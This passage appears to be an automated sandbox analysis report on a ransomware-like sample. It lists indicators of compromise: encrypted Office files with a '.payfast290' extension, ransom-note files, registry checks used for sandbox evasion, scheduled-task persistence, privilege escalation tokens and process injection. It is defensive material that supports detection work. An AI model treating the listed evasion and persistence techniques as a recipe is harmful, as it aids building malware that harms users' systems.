C:\Program Files\Microsoft Office\root\Licenses16\AccessRuntime2019R_PrepidBypass-ppd.xrm-ms WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ppd.xrm-ms.payfast290.35E-E0D-55E smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_OEM_Perp-ppd.xrm-ms WerFault.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml WerFault.exe File created C:\Program Files\Microsoft Office\root\Document Themes 16\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Extreme Shadow.eftx smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Grace-ul-oob.xrm-ms.payfast290.35E-E0D-55E WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp-ul-phn.xrm-ms.payfast290.35E-E0D-55E smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Retail-ul-phn.xrm-ms.payfast290.35E-E0D-55E smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.officemui.msi.16.en-us.xml smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Retail-ul-oob.xrm-ms smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-ul-oob.xrm-ms WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial-ppd.xrm-ms.payfast290.35E-E0D-55E WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16EnterpriseVL_Bypass30-ul-oob.xrm-ms smss.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml.payfast290.35E-E0D-55E smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Retail-ul-phn.xrm-ms.payfast290.35E-E0D-55E smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019DemoR_BypassTrial180-ppd.xrm-ms.payfast290.35E-E0D-55E WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_OEM_Perp-ul-phn.xrm-ms smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Office 2007 - 2010.xml smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp3-ul-oob.xrm-ms.payfast290.35E-E0D-55E WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-ppd.xrm-ms.payfast290.35E-E0D-55E WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ul-phn.xrm-ms.payfast290.35E-E0D-55E smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Office 2007 - 2010.eftx WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Retail-ppd.xrm-ms WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_OEM_Perp-ul-oob.xrm-ms.payfast290.35E-E0D-55E WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp3-pl.xrm-ms smss.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT.xml smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.officemuiset.msi.16.en-us.xml smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelVL_MAK-pl.xrm-ms.payfast290.35E-E0D-55E WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-ul-phn.xrm-ms.payfast290.35E-E0D-55E WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Marquee.xml smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_OEM_Perp-ul-oob.xrm-ms WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Retail-ul-oob.xrm-ms smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red Orange.xml.payfast290.35E-E0D-55E smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.payfast290.35E-E0D-55E smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ul-oob.xrm-ms smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-pl.xrm-ms.payfast290.35E-E0D-55E WerFault.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 40 IoCs
pid pid_target Process procid_target 5468 3928 WerFault.exe 123 4168 2108 WerFault.exe 104 2396 1388 WerFault.exe 115 1204 340 WerFault.exe 90 2804 1612 WerFault.exe 110 5256 668 WerFault.exe 100 5016 2544 WerFault.exe 102 1632 132 WerFault.exe 194 5436 132 WerFault.exe 194 1852 4968 WerFault.exe 230 668 5808 WerFault.exe 215 6340 3052 WerFault.exe 96 2740 3360 WerFault.exe 298 6428 6328 WerFault.exe 333 7732 3992 WerFault.exe 284 7820 3872 WerFault.exe 345 4396 6400 WerFault.exe 302 3280 8052 WerFault.exe 379 7768 72 WerFault.exe 320 6644 2264 WerFault.exe 216 4028 6948 WerFault.exe 491 6272 3912 WerFault.exe 509 2188 1604 WerFault.exe 588 5820 5764 WerFault.exe 596 1464 7556 WerFault.exe 599 9520 6884 WerFault.exe 638 11204 10524 WerFault.exe 655 10476 5768 WerFault.exe 653 9556 10212 WerFault.exe 685 11460 10680 WerFault.exe 814 9000 8736 WerFault.exe 835 9552 4136 WerFault.exe 870 2044 8024 WerFault.exe 898 1632 3944 WerFault.exe 1033 3180 3896 WerFault.exe 1064 7480 2136 WerFault.exe 1094 11516 6608 WerFault.exe 1104 8788 12460 WerFault.exe 1148 9580 12392 WerFault.exe 1149 3540 3840 Process not Found 1163 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RJdm3ls_W_5VxM1V2T9DXdH0.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RJdm3ls_W_5VxM1V2T9DXdH0.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RJdm3ls_W_5VxM1V2T9DXdH0.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier ZFjqdvUVGG4soKAHBCOsWL6w.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ZFjqdvUVGG4soKAHBCOsWL6w.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 ZFjqdvUVGG4soKAHBCOsWL6w.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier ZFjqdvUVGG4soKAHBCOsWL6w.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision ZFjqdvUVGG4soKAHBCOsWL6w.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2200 schtasks.exe 4432 schtasks.exe -
Enumerates system info in registry 2 TTPs 48 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS ZFjqdvUVGG4soKAHBCOsWL6w.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU ZFjqdvUVGG4soKAHBCOsWL6w.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 1 IoCs
pid Process 5448 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4600 Setup (7).exe 4600 Setup (7).exe 2396 WerFault.exe 2396 WerFault.exe 4116 Nsuse6Bs42Jg34a5HyHe3clA.exe 4116 Nsuse6Bs42Jg34a5HyHe3clA.exe 4116 Nsuse6Bs42Jg34a5HyHe3clA.exe 4116 Nsuse6Bs42Jg34a5HyHe3clA.exe 4168 WerFault.exe 4168 WerFault.exe 5468 WerFault.exe 5468 WerFault.exe 4472 RJdm3ls_W_5VxM1V2T9DXdH0.exe 4472 RJdm3ls_W_5VxM1V2T9DXdH0.exe 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 5256 WerFault.exe 5256 WerFault.exe 1204 WerFault.exe 1204 WerFault.exe 1692 jAkEf6fFJtpWep78XXvMZnjX.exe 1692 jAkEf6fFJtpWep78XXvMZnjX.exe 2804 WerFault.exe 2804 WerFault.exe 3132 Process not Found 3132 Process not Found 5736 powershell.exe 5736 powershell.exe 5016 WerFault.exe 5016 WerFault.exe 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 5480 powershell.exe 3132 Process not Found 3132 Process not Found 5480 powershell.exe 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3132 Process not Found -
Suspicious behavior: MapViewOfSection 19 IoCs
pid Process 4472 RJdm3ls_W_5VxM1V2T9DXdH0.exe 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found 3132 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 968 7r8eheenr48ifSwYOruBNk3H.exe Token: SeRestorePrivilege 4168 WerFault.exe Token: SeBackupPrivilege 4168 WerFault.exe Token: SeBackupPrivilege 4168 WerFault.exe Token: SeDebugPrivilege 4116 Nsuse6Bs42Jg34a5HyHe3clA.exe Token: SeImpersonatePrivilege 4116 Nsuse6Bs42Jg34a5HyHe3clA.exe Token: SeTcbPrivilege 2056 svchost.exe Token: SeTcbPrivilege 2056 svchost.exe Token: SeDebugPrivilege 5448 WerFault.exe Token: SeDebugPrivilege 1692 jAkEf6fFJtpWep78XXvMZnjX.exe Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeDebugPrivilege 5736 powershell.exe Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeManageVolumePrivilege 2352 md8_8eus.exe Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeDebugPrivilege 5480 powershell.exe Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found Token: SeCreatePagefilePrivilege 3132 Process not Found Token: SeShutdownPrivilege 3132 Process not Found -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 7040 6CFE.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3132 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4600 wrote to memory of 804 4600 Setup (7).exe 99 PID 4600 wrote to memory of 804 4600 Setup (7).exe 99 PID 4600 wrote to memory of 804 4600 Setup (7).exe 99 PID 4600 wrote to memory of 592 4600 Setup (7).exe 101 PID 4600 wrote to memory of 592 4600 Setup (7).exe 101 PID 4600 wrote to memory of 592 4600 Setup (7).exe 101 PID 4600 wrote to memory of 668 4600 Setup (7).exe 100 PID 4600 wrote to memory of 668 4600 Setup (7).exe 100 PID 4600 wrote to memory of 668 4600 Setup (7).exe 100 PID 4600 wrote to memory of 700 4600 Setup (7).exe 98 PID 4600 wrote to memory of 700 4600 Setup (7).exe 98 PID 4600 wrote to memory of 700 4600 Setup (7).exe 98 PID 4600 wrote to memory of 3000 4600 Setup (7).exe 97 PID 4600 wrote to memory of 3000 4600 Setup (7).exe 97 PID 4600 wrote to memory of 3000 4600 Setup (7).exe 97 PID 4600 wrote to memory of 3052 4600 Setup (7).exe 96 PID 4600 wrote to memory of 3052 4600 Setup (7).exe 96 PID 4600 wrote to memory of 3052 4600 Setup (7).exe 96 PID 4600 wrote to memory of 3056 4600 Setup (7).exe 95 PID 4600 wrote to memory of 3056 4600 Setup (7).exe 95 PID 4600 wrote to memory of 3056 4600 Setup (7).exe 95 PID 4600 wrote to memory of 968 4600 Setup (7).exe 91 PID 4600 wrote to memory of 968 4600 Setup (7).exe 91 PID 4600 wrote to memory of 4772 4600 Setup (7).exe 94 PID 4600 wrote to memory of 4772 4600 Setup (7).exe 94 PID 4600 wrote to memory of 4772 4600 Setup (7).exe 94 PID 4600 wrote to memory of 860 4600 Setup (7).exe 93 PID 4600 wrote to memory of 860 4600 Setup (7).exe 93 PID 4600 wrote to memory of 860 4600 Setup (7).exe 93 PID 4600 wrote to memory of 340 4600 Setup (7).exe 90 PID 4600 wrote to memory of 340 4600 Setup (7).exe 90 PID 4600 wrote to memory of 340 4600 Setup (7).exe 90 PID 4600 wrote to memory of 1136 4600 Setup (7).exe 89 PID 4600 wrote to memory of 1136 4600 Setup (7).exe 89 PID 4600 wrote to memory of 1136 4600 Setup (7).exe 89 PID 4600 wrote to memory of 1288 4600 Setup (7).exe 92 PID 4600 wrote to memory of 1288 4600 Setup (7).exe 92 PID 4600 wrote to memory of 1672 4600 Setup (7).exe 109 PID 4600 wrote to memory of 1672 4600 Setup (7).exe 109 PID 4600 wrote to memory of 1672 4600 Setup (7).exe 109 PID 4600 wrote to memory of 1692 4600 Setup (7).exe 108 PID 4600 wrote to memory of 1692 4600 Setup (7).exe 108 PID 4600 wrote to memory of 1692 4600 Setup (7).exe 108 PID 4600 wrote to memory of 1612 4600 Setup (7).exe 110 PID 4600 wrote to memory of 1612 4600 Setup (7).exe 110 PID 4600 wrote to memory of 1612 4600 Setup (7).exe 110 PID 4600 wrote to memory of 1820 4600 Setup (7).exe 107 PID 4600 wrote to memory of 1820 4600 Setup (7).exe 107 PID 4600 wrote to memory of 1820 4600 Setup (7).exe 107 PID 4600 wrote to memory of 2056 4600 Setup (7).exe 143 PID 4600 wrote to memory of 2056 4600 Setup (7).exe 143 PID 4600 wrote to memory of 2056 4600 Setup (7).exe 143 PID 4600 wrote to memory of 2108 4600 Setup (7).exe 104 PID 4600 wrote to memory of 2108 4600 Setup (7).exe 104 PID 4600 wrote to memory of 2108 4600 Setup (7).exe 104 PID 4600 wrote to memory of 2544 4600 Setup (7).exe 102 PID 4600 wrote to 